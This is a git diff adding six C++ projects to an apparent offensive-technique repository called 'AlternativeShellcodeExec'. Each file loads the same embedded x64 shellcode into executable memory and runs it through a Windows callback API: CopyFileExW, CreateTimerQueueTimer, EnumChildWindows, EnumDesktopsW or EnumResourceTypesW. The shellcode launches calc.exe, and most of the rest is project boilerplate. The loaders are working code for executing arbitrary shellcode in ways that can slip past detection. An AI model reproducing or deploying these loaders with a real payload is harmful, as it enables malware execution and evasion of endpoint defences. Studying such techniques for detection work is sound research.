diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index ae9454d..bfd49a1 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -5,6 +5,18 @@ VisualStudioVersion = 16.0.30907.101 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateThreadPoolWait", "CreateThreadPoolWait\CreateThreadPoolWait.vcxproj", "{7C60D205-1563-4BEC-BB27-1D7C3B58A08F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateTimerQueueTimer_Tech", "CreateTimerQueueTimer_Tech\CreateTimerQueueTimer_Tech.vcxproj", "{7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumDesktopW", "EnumDesktopW\EnumDesktopW.vcxproj", "{CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesW", "EnumResourceTypesW\EnumResourceTypesW.vcxproj", "{CA6231C1-405A-482E-B59A-35ADCCC15DDD}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CopyFileEx", "CopyFileEx\CopyFileEx.vcxproj", "{C8677CA2-23B4-4148-8298-75DC082DD05C}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumWindows", "EnumWindows\EnumWindows.vcxproj", "{E767D317-98AA-4E0B-BE90-1C19844EFB1B}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumChildWindows", "EnumChildWindows\EnumChildWindows.vcxproj", "{F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -21,6 +33,54 @@ Global {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x64.Build.0 = Release|x64 {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x86.ActiveCfg = Release|Win32 {7C60D205-1563-4BEC-BB27-1D7C3B58A08F}.Release|x86.Build.0 = Release|Win32 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Debug|x64.ActiveCfg = Debug|x64 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Debug|x64.Build.0 = Debug|x64 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Debug|x86.ActiveCfg = Debug|Win32 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Debug|x86.Build.0 = Debug|Win32 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Release|x64.ActiveCfg = Release|x64 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Release|x64.Build.0 = Release|x64 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Release|x86.ActiveCfg = Release|Win32 + {7D1E2EC5-FB57-4148-A6EB-59EEECE4A660}.Release|x86.Build.0 = Release|Win32 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Debug|x64.ActiveCfg = Debug|x64 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Debug|x64.Build.0 = Debug|x64 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Debug|x86.ActiveCfg = Debug|Win32 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Debug|x86.Build.0 = Debug|Win32 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Release|x64.ActiveCfg = Release|x64 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Release|x64.Build.0 = Release|x64 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Release|x86.ActiveCfg = Release|Win32 + {CB1843DF-3D4F-4D8D-B3C8-70D1D722E2A9}.Release|x86.Build.0 = Release|Win32 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Debug|x64.ActiveCfg = Debug|x64 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Debug|x64.Build.0 = Debug|x64 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Debug|x86.ActiveCfg = Debug|Win32 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Debug|x86.Build.0 = Debug|Win32 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Release|x64.ActiveCfg = Release|x64 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Release|x64.Build.0 = Release|x64 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Release|x86.ActiveCfg = Release|Win32 + {CA6231C1-405A-482E-B59A-35ADCCC15DDD}.Release|x86.Build.0 = Release|Win32 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Debug|x64.ActiveCfg = Debug|x64 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Debug|x64.Build.0 = Debug|x64 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Debug|x86.ActiveCfg = Debug|Win32 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Debug|x86.Build.0 = Debug|Win32 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Release|x64.ActiveCfg = Release|x64 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Release|x64.Build.0 = Release|x64 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Release|x86.ActiveCfg = Release|Win32 + {C8677CA2-23B4-4148-8298-75DC082DD05C}.Release|x86.Build.0 = Release|Win32 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Debug|x64.ActiveCfg = Debug|x64 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Debug|x64.Build.0 = Debug|x64 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Debug|x86.ActiveCfg = Debug|Win32 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Debug|x86.Build.0 = Debug|Win32 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Release|x64.ActiveCfg = Release|x64 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Release|x64.Build.0 = Release|x64 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Release|x86.ActiveCfg = Release|Win32 + {E767D317-98AA-4E0B-BE90-1C19844EFB1B}.Release|x86.Build.0 = Release|Win32 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Debug|x64.ActiveCfg = Debug|x64 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Debug|x64.Build.0 = Debug|x64 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Debug|x86.ActiveCfg = Debug|Win32 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Debug|x86.Build.0 = Debug|Win32 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Release|x64.ActiveCfg = Release|x64 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Release|x64.Build.0 = Release|x64 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Release|x86.ActiveCfg = Release|Win32 + {F7214DDD-57B1-46BA-A54A-876CC7CF7D5E}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/CopyFileEx/CopyFileEx.cpp b/CopyFileEx/CopyFileEx.cpp new file mode 100644 index 0000000..1d540ec --- /dev/null +++ b/CopyFileEx/CopyFileEx.cpp @@ -0,0 +1,48 @@ +#include +#include +#include + + +int err(const char* errmsg) { + + + printf("Error: %s (%u)\n", errmsg, ::GetLastError()); + return 1; + +} + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log"); + ::CopyFileExW(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", (LPPROGRESS_ROUTINE)addr, NULL, FALSE, COPY_FILE_FAIL_IF_EXISTS); + +} \ No newline at end of file diff --git a/CopyFileEx/CopyFileEx.vcxproj b/CopyFileEx/CopyFileEx.vcxproj new file mode 100644 index 0000000..18cbbac --- /dev/null +++ b/CopyFileEx/CopyFileEx.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c8677ca2-23b4-4148-8298-75dc082dd05c} + CopyFileEx + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/CopyFileEx/CopyFileEx.vcxproj.filters b/CopyFileEx/CopyFileEx.vcxproj.filters new file mode 100644 index 0000000..e085030 --- /dev/null +++ b/CopyFileEx/CopyFileEx.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.cpp b/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.cpp new file mode 100644 index 0000000..4785238 --- /dev/null +++ b/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.cpp @@ -0,0 +1,47 @@ +#include +#include + + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + + + HANDLE timer; + HANDLE queue = ::CreateTimerQueue(); + HANDLE gDoneEvent = ::CreateEvent(NULL, TRUE, FALSE, NULL); + if (!::CreateTimerQueueTimer(&timer, queue, (WAITORTIMERCALLBACK)addr, NULL, 100, 0, 0)) { + + printf("Fail"); + } + + if (::WaitForSingleObject(gDoneEvent, INFINITE) != WAIT_OBJECT_0) + printf("WaitForSingleObject failed (%d)\n", GetLastError()); +} \ No newline at end of file diff --git a/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj b/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj new file mode 100644 index 0000000..8684697 --- /dev/null +++ b/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {7d1e2ec5-fb57-4148-a6eb-59eeece4a660} + CreateTimerQueueTimerTech + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj.filters b/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj.filters new file mode 100644 index 0000000..7349a73 --- /dev/null +++ b/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/EnumChildWindows/EnumChildWindows.cpp b/EnumChildWindows/EnumChildWindows.cpp new file mode 100644 index 0000000..0764a08 --- /dev/null +++ b/EnumChildWindows/EnumChildWindows.cpp @@ -0,0 +1,46 @@ +#include +#include + + + +int err(const char* errmsg) { + + + printf("Error: %s (%u)\n", errmsg, ::GetLastError()); + return 1; + +} +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + ::EnumChildWindows(NULL, (WNDENUMPROC)addr, NULL); + + +} \ No newline at end of file diff --git a/EnumChildWindows/EnumChildWindows.vcxproj b/EnumChildWindows/EnumChildWindows.vcxproj new file mode 100644 index 0000000..3a94be4 --- /dev/null +++ b/EnumChildWindows/EnumChildWindows.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {f7214ddd-57b1-46ba-a54a-876cc7cf7d5e} + EnumChildWindows + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumChildWindows/EnumChildWindows.vcxproj.filters b/EnumChildWindows/EnumChildWindows.vcxproj.filters new file mode 100644 index 0000000..35a7707 --- /dev/null +++ b/EnumChildWindows/EnumChildWindows.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/EnumDesktopW/EnumDesktopW.cpp b/EnumDesktopW/EnumDesktopW.cpp new file mode 100644 index 0000000..95b3dc3 --- /dev/null +++ b/EnumDesktopW/EnumDesktopW.cpp @@ -0,0 +1,53 @@ +#include +#include + + + +int err(const char* errmsg) { + + + printf("Error: %s (%u)\n", errmsg, ::GetLastError()); + return 1; + +} + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + + + HANDLE timer; + HANDLE queue = ::CreateTimerQueue(); + HANDLE gDoneEvent = ::CreateEvent(NULL, TRUE, FALSE, NULL); + + ::EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)addr, NULL); + + +} \ No newline at end of file diff --git a/EnumDesktopW/EnumDesktopW.vcxproj b/EnumDesktopW/EnumDesktopW.vcxproj new file mode 100644 index 0000000..82c0167 --- /dev/null +++ b/EnumDesktopW/EnumDesktopW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {cb1843df-3d4f-4d8d-b3c8-70d1d722e2a9} + EnumDesktopW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumDesktopW/EnumDesktopW.vcxproj.filters b/EnumDesktopW/EnumDesktopW.vcxproj.filters new file mode 100644 index 0000000..03a1ca9 --- /dev/null +++ b/EnumDesktopW/EnumDesktopW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/EnumResourceTypesW/EnumResourceTypesW.cpp b/EnumResourceTypesW/EnumResourceTypesW.cpp new file mode 100644 index 0000000..bd2a8fa --- /dev/null +++ b/EnumResourceTypesW/EnumResourceTypesW.cpp @@ -0,0 +1,46 @@ +#include +#include + + + +int err(const char* errmsg) { + + + printf("Error: %s (%u)\n", errmsg, ::GetLastError()); + return 1; + +} + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + +int main() { + + + LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + ::RtlMoveMemory(addr, op, sizeof(op)); + + ::EnumResourceTypesW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)addr, NULL); + +} \ No newline at end of file diff --git a/EnumResourceTypesW/EnumResourceTypesW.vcxproj b/EnumResourceTypesW/EnumResourceTypesW.vcxproj new file mode 100644 index 0000000..ed0e6d9 --- /dev/null +++ b/EnumResourceTypesW/EnumResourceTypesW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {ca6231c1-405a-482e-b59a-35adccc15ddd} + EnumResourceTypesW + 10.0 + 